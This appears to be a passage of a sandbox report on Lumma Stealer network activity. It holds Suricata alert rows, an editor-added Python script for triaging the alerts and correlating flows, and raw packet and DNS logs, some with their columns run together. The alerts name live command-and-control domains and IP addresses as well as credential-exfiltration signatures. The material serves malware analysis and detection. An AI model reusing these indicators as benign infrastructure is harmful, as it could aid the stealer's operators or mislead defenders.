2025-01-10T11:36:12.976226+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49762 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:14.301208+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:14.719353+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:15.320339+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49779 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:16.483701+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49788 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:17.826170+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49799 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:18.838630+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49805 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:19.840374+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49811 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:20.313124+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49811 | 104.21.48.1 | 443 | TCP
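Three things an analyst pulls out of an alert table like this one: the looked-up domains, which Emerging Threats writes into rule names in a defanged spelling with a space before the TLD ("enterwahsh .biz"); the remote hosts behind the severity-1 alerts; and which of the repeated JA3 hits (severity 3, informational on their own) share a TCP flow with a checkin or exfiltration signature, so that the fingerprint match is corroborated rather than standing alone. The script below is an added example, not part of the Joe Sandbox report or of Suricata. ALERTS is ten rows of the table above transcribed into a pipe-delimited form; the flow-correlation rule and the field names are the editor's own.

```python
"""IOC triage over Suricata alert rows from a sandbox report.

Added example, not Joe Sandbox or Suricata code. ALERTS is a subset of the
report's alert table transcribed by hand; the correlation rule is an assumption.
"""
import re
from collections import defaultdict

# Constructed from the report's alert table: 3 DNS-lookup alerts and 7 TCP alerts.
ALERTS = """\
2025-01-10T11:36:09.495762+0100 | 2058608 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (enterwahsh .biz) | 1 | 192.168.2.3 | 56184 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.581828+0100 | 2058514 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat) | 1 | 192.168.2.3 | 50072 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:09.669950+0100 | 2058480 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat) | 1 | 192.168.2.3 | 50835 | 1.1.1.1 | 53 | UDP
2025-01-10T11:36:10.352691+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP
2025-01-10T11:36:10.823273+0100 | 2858666 | ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup | 1 | 192.168.2.3 | 49745 | 104.102.49.254 | 443 | TCP
2025-01-10T11:36:11.568040+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:12.005133+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.3 | 49754 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:14.301208+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:14.719353+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.3 | 49773 | 104.21.48.1 | 443 | TCP
2025-01-10T11:36:15.320339+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.3 | 49779 | 104.21.48.1 | 443 | TCP
"""

FIELDS = ("ts", "sid", "sig", "severity", "src", "sport", "dst", "dport", "proto")
DEFANGED = re.compile(r"\(([A-Za-z0-9-]+) \.([A-Za-z]+)\)")   # matches "(name .tld)"


def parse_alerts(text):
    """Turn the pipe-delimited rows into dicts keyed by FIELDS, with numeric columns as int."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        parts = [p.strip() for p in line.split(" | ")]
        if len(parts) != len(FIELDS):
            raise ValueError(f"unexpected column count in row: {line!r}")
        row = dict(zip(FIELDS, parts))
        for key in ("sid", "severity", "sport", "dport"):
            row[key] = int(row[key])
        rows.append(row)
    return rows


def refang(signature):
    """Recover 'name.tld' from the 'name .tld' spelling used in the rule name, or None."""
    m = DEFANGED.search(signature)
    return f"{m.group(1)}.{m.group(2)}".lower() if m else None


def lookup_domains(alerts):
    """Sorted domains named by the DNS-lookup signatures."""
    found = set()
    for a in alerts:
        if "DNS Lookup" in a["sig"]:
            domain = refang(a["sig"])
            if domain:
                found.add(domain)
    return sorted(found)


def flow_key(a):
    return (a["src"], a["sport"], a["dst"], a["dport"], a["proto"])


def corroborated_flows(alerts):
    """Flows where a JA3 hit shares the connection with a severity-1 MALWARE alert.

    Returns {flow_key: sorted SIDs on that flow}. A JA3 match with nothing else
    on the flow stays out, since a fingerprint alone is weak evidence.
    """
    by_flow = defaultdict(list)
    for a in alerts:
        by_flow[flow_key(a)].append(a)
    out = {}
    for key, hits in by_flow.items():
        has_ja3 = any("JA3" in h["sig"] for h in hits)
        has_malware = any(h["severity"] == 1 and "MALWARE" in h["sig"] for h in hits)
        if has_ja3 and has_malware:
            out[key] = sorted(h["sid"] for h in hits)
    return out


def severity1_tcp_endpoints(alerts):
    """Sorted (dst ip, dst port) pairs that severity-1 alerts fired on over TCP."""
    return sorted({(a["dst"], a["dport"]) for a in alerts
                   if a["severity"] == 1 and a["proto"] == "TCP"})


if __name__ == "__main__":
    rows = parse_alerts(ALERTS)
    print("domains:", lookup_domains(rows))
    print("endpoints:", severity1_tcp_endpoints(rows))
    for key, sids in corroborated_flows(rows).items():
        print("flow", key, "sids", sids)
```

Of the JA3 alerts in the subset, the ones on source ports 49745, 49754 and 49773 are corroborated by a severity-1 signature on the same flow; the one on 49779 is not. The endpoint list deliberately leaves interpretation to the analyst: the report flags 104.102.49.254 through a "Steam Profile Lookup" rule and does not say what that host is, so the script reports it alongside 104.21.48.1 rather than labelling either.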
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 11:36:09.692198038 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:09.692225933 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:09.692301035 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:09.697107077 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:09.697119951 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.352534056 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.352690935 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.361092091 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.361110926 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.361501932 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.407738924 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.421279907 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.463330030 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823328972 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823359966 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823390007 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823409081 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823430061 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823501110 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.823501110 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.823524952 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.823580980 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.917702913 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.917737007 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.917825937 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.917840958 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.917865992 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.917882919 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.922738075 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.922787905 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.927298069 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.927345037 CET | 49745 | 443 | 192.168.2.3 | 104.102.49.254
Jan 10, 2025 11:36:10.927352905 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
Jan 10, 2025 11:36:10.927377939 CET | 443 | 49745 | 104.102.49.254 | 192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.927417994 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943044901 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943064928 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943092108 CET49745443192.168.2.3104.102.49.254
                                                                                                                                                                                                            Jan 10, 2025 11:36:10.943103075 CET44349745104.102.49.254192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101442099 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101454020 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.101516008 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.111591101 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.111603975 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.567948103 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.568039894 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570105076 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570116043 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.570362091 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571726084 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571744919 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:11.571810007 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005136967 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005228996 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.005419970 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006002903 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006022930 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006032944 CET49754443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.006038904 CET44349754104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036082983 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036128998 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036441088 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036750078 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.036760092 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.518943071 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.519063950 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520350933 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520360947 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.520906925 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522331953 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522367954 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.522433996 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976216078 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976259947 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976286888 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976326942 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976345062 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976352930 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976372004 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976387024 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976417065 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.976577997 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981750011 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981784105 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981811047 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981822014 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981827021 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:12.981862068 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.032758951 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.032788038 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.076967955 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077003956 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077100039 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077128887 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077148914 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077192068 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077219963 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077421904 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077445984 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077460051 CET49762443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.077465057 CET44349762104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846307993 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846354961 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.846438885 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.847595930 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:13.847610950 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.301132917 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.301208019 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302515984 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302525997 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.302793980 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304140091 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304306030 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.304342985 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719460964 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719691038 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719754934 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719825029 CET49773443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.719842911 CET44349773104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864541054 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864573002 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.864655018 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.865036964 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:14.865048885 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.320235014 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.320338964 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321656942 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321666956 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.321926117 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323189020 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323298931 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.323333025 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781018019 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781131029 CET44349779104.21.48.1192.168.2.3
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781235933 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781443119 CET49779443192.168.2.3104.21.48.1
                                                                                                                                                                                                            Jan 10, 2025 11:36:15.781461000 CET44349779104.21.48.1192.168.2.3
Jan 10, 2025 11:36:15.990763903 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:15.990816116 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:15.990981102 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:15.991697073 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:15.991712093 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:16.483596087 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:16.483700991 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:16.485018969 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:16.485024929 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:16.485367060 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:16.486953020 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:16.487102985 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:16.487147093 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:16.487240076 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:16.487248898 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.131791115 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.131911039 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.132122993 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.132186890 CET  49788        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.132210970 CET  443          49788      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.344269991 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.344312906 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.344393015 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.344825983 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.344840050 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.826047897 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.826169968 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.828222990 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.828233957 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.828531981 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:17.829824924 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.829921007 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:17.829930067 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.252223015 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.252509117 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.252643108 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.252796888 CET  49799        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.252816916 CET  443          49799      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.381783009 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.381825924 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.382263899 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.382263899 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.382299900 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.838473082 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.838629961 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.839940071 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.839956045 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.840176105 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:18.841492891 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.841691971 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:18.841705084 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.328624010 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.328888893 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.329005003 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.329049110 CET  49805        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.329071045 CET  443          49805      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.355211020 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.355262041 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.355348110 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.355664968 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.355679035 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.840256929 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.840373993 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.841666937 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.841679096 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.842715025 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:19.843961000 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.843986034 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:19.844124079 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:20.313123941 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:20.313237906 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:20.313319921 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:20.313481092 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:20.313507080 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:20.313513994 CET  49811        443        192.168.2.3    104.21.48.1
Jan 10, 2025 11:36:20.313520908 CET  443          49811      104.21.48.1    192.168.2.3
Jan 10, 2025 11:36:36.149585962 CET  57705        53         192.168.2.3    162.159.36.2
Jan 10, 2025 11:36:36.154470921 CET  53           57705      162.159.36.2   192.168.2.3
Jan 10, 2025 11:36:36.154623985 CET  57705        53         192.168.2.3    162.159.36.2
Jan 10, 2025 11:36:36.159535885 CET  53           57705      162.159.36.2   192.168.2.3
Jan 10, 2025 11:36:36.620498896 CET  57705        53         192.168.2.3    162.159.36.2
Jan 10, 2025 11:36:36.625494957 CET  53           57705      162.159.36.2   192.168.2.3
Jan 10, 2025 11:36:36.625926971 CET  57705        53         192.168.2.3    162.159.36.2
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Jan 10, 2025 11:36:09.495762110 CET  56184        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.576889992 CET  53           56184      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.581828117 CET  50072        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.591504097 CET  53           50072      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.594357967 CET  56386        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.603127956 CET  53           56386      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.605983973 CET  60721        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.617432117 CET  53           60721      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.620028973 CET  50960        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.628998995 CET  53           50960      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.630240917 CET  63788        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.640355110 CET  53           63788      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.644088030 CET  62975        53         192.168.2.3    1.1.1.1
Jan 10, 2025 11:36:09.652705908 CET  53           62975      1.1.1.1        192.168.2.3
Jan 10, 2025 11:36:09.658298969 CET  57859        53         192.168.2.3    1.1.1.1
